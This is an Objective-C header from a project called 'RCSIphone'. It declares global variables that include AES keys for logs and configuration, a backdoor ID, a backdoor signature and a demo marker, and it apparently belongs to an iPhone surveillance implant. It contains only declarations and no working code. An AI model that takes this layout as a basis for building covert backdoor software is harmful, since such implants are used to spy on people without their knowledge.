//
//  RCSIGlobals.h
//  RCSIphone
//
//  Created by armored on 8/20/12.
//  Copyright 2012 __MyCompanyName__. All rights reserved.
//

#import <Foundation/Foundation.h>

extern char     gLogAesKey[];
extern char     gConfAesKey[];
extern char     gInstanceId[];
extern char     gBackdoorID[];
extern char     gBackdoorSignature[];
extern u_int    gVersion;
extern char     gDemoMarker[];
extern char     gBackdoorPseduoSign[];
